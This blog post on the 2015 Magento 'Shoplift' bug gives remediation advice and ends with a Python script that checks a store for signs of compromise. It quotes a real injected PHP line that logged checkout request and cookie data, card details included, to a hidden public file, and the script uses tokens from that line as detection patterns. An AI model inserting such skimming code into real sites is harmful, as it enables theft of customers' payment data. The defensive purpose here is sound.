Written by Giles Bennett
What's the problem
If you've got a Magento store, then in recent weeks you cannot help but have noticed the numerous reminders about important Magento patches that should be installed to protect the security and integrity of your site. These stem from a security flaw termed the "Shoplift Bug" discovered in January 2015, the full details of which were revealed in April 2015. Although a patch had been made available by Magento in February to fix the flaw, that patch wasn't widely taken up - one estimate was that at the time the details of the flaw were revealed, only 50% of all sites had been patched.
We have helped one client (not hosted with us, we hasten to add) who had suffered at the hands of hackers - in their case lib/Varien/Autoload.php had been hacked to include the following:
[php]<?php if(preg_match("/checkout|cart/", $_SERVER["REQUEST_URI"])){@file_put_contents(realpath("./")."/media/catalog/product/cache_catalogs", @base64_encode(serialize($_REQUEST)."--".serialize($_COOKIE)). ":", FILE_APPEND); }?>[/php]
The result of the hack was that the contents of all requests to URLs which included the words "checkout" or "cart" in them were encoded and left in a file hidden deep within the media folder - that file was publicly accessible and could be picked up and decoded by the hackers at their leisure. Whilst the payment processing was handled by their payment gateway, the card details, expiry dates, CVV numbers and address details were handled on the client's checkout, so all that information was contained within the encoded file.
The hack also added a number of "semi-official" looking user accounts, using names like System Backup and email address @magento.com, as well as leaving a backdoor in the skin/ folder for future usage.
With those details compromised, the only line of defence against card fraud then becomes the 3D Secure code, if enabled on the account, and if enabled on any website on which the fraudsters attempt to use the card.
Either way, by having card details exposed in such a way, you leave yourself vulnerable to very large fines from the PCI DSS side of things.
What you should be doing about it
There are a number of things that you can do right now to check if your site is at risk:
- Use this free website to check if your site is at risk of the Shoplift bug
- Check the admin accounts on your site (from the admin panel go to System / Permissions / Users) - disable and delete any that you don't recognise straight away, and disable any others. The worst that's going to happen is you annoy someone who you'd forgotten had access to your site, but if you don't recognise them in the list, it's more likely that they've not worked on the site in a while anyway!
- If you have FTP access to your site (and hopefully you've got SFTP access, if any access, to your site) then look in the skin/ folder and see if there are any files in there - folders named "adminhtml", "frontend" and "install" are fine, it's files you're worried about.
- Also if you have SFTP or FTP access to your site, look in the lib/Varien folder and download the Autoload.php file - open it up in a text editor on your computer (it's perfectly safe to do so) and look at the first line - be sure to scroll to the right, if you can - and see if it looks like the suspicious line above.
- Make sure, by asking your hosts, your developers, or us, that the security patches have been installed.
- Make sure, by looking at the bottom of any page in your admin panel, that you're up to date in Magento versions (you should be on version 1.9.1.1). If you're on 1.8, we'll probably forgive you, but if you're on 1.7 or below, it's time to start thinking about updating to the latest version - get in touch if you're not sure how to go about that.
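The filesystem checks from the list above (files sitting directly in skin/, the first line of lib/Varien/Autoload.php, and the cache_catalogs file from the incident described earlier) can be run in one pass on the server. This is an added example, not part of the original article or of Magento; the function name check_magento_root is hypothetical, and it assumes a clean Autoload.php begins with a bare `<?php` line.

```python
import re
import sys
from pathlib import Path

# Tokens taken from the injected line quoted in the article.
TOKENS = re.compile(rb"preg_match|file_put_contents|base64_encode|\$_REQUEST|\$_COOKIE")
# Drop file path from the incident the article describes.
DROP_FILE = Path("media/catalog/product/cache_catalogs")


def check_magento_root(root):
    """Return (check, path, detail) tuples for indicators found under root."""
    root = Path(root)
    findings = []

    # 1. Autoload.php: the article says the injected code sat on the first line.
    autoload = root / "lib" / "Varien" / "Autoload.php"
    if autoload.is_file():
        with autoload.open("rb") as fh:
            first = fh.readline().strip()
        hits = sorted({m.decode() for m in TOKENS.findall(first)})
        if hits:
            findings.append(("autoload", str(autoload), ", ".join(hits)))
        elif first != b"<?php":
            # Assumption: a clean file starts with a bare opening tag.
            findings.append(("autoload", str(autoload), "unexpected first line"))

    # 2. skin/: sub-folders are expected, files directly inside are not.
    skin = root / "skin"
    if skin.is_dir():
        for entry in sorted(skin.iterdir()):
            if entry.is_file():
                findings.append(("skin", str(entry), "file in skin/ root"))

    # 3. The harvested-request file left in the media folder.
    drop = root / DROP_FILE
    if drop.exists():
        findings.append(("dropfile", str(drop), f"{drop.stat().st_size} bytes"))

    return findings


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for check, path, detail in check_magento_root(target):
        print(f"[{check}] {path}: {detail}")
```

Run it with the Magento document root as the only argument. An empty result covers only these three indicators, so the admin account and patch checks in the list still apply.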